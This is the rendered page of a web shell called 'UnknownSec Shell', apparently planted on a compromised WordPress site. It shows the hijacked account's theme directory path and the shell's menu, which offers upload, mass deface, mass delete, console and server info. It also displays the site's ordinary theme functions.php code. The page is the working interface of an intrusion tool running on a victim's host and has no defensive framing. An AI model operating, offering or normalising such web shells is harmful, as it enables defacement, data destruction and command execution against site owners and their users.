shell bypass 403
UnknownSec Shell
:
/
home
/
akwariom
/
www
/
wp-content
/
themes
/
esplanade-child
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
functions.php
<?php // Opening PHP tag - nothing should be before this, not even whitespace // Fix for qTranslate plugin and "Home" menu link reverting back to default language // http://wordpress.org/support/topic/plugin-qtranslate-back-to-default-language-why?replies=4#post-3273387 if (function_exists('qtrans_convertURL')) { function qtrans_in_nav_el($output, $item, $depth, $args) { $attributes = !empty($item->attr_title) ? ' title="' . esc_attr($item->attr_title) . '"' : ''; $attributes .=!empty($item->target) ? ' target="' . esc_attr($item->target) . '"' : ''; $attributes .=!empty($item->xfn) ? ' rel="' . esc_attr($item->xfn) . '"' : ''; // Integration with qTranslate Plugin $attributes .=!empty($item->url) ? ' href="' . esc_attr( qtrans_convertURL($item->url) ) . '"' : ''; $output = $args->before; $output .= '<a' . $attributes . '>'; $output .= $args->link_before . apply_filters('the_title', $item->title, $item->ID) . $args->link_after; $output .= ''; $output .= $args->after; return $output; } add_filter('walker_nav_menu_start_el', 'qtrans_in_nav_el', 10, 4); } function esplanade_child_theme_scripts() { wp_register_script( 'bootstrap-js', get_template_directory_uri() . '/bootstrap/js/bootstrap.min.js', array( 'jquery' ), '3.0.1', true ); wp_register_style( 'bootstrap-css', get_template_directory_uri() . '/bootstrap/css/bootstrap.min.css', array(), '3.0.1', 'all' ); wp_enqueue_script( 'bootstrap-js' ); wp_enqueue_style( 'bootstrap-css' ); } ?>
© 2026 UnknownSec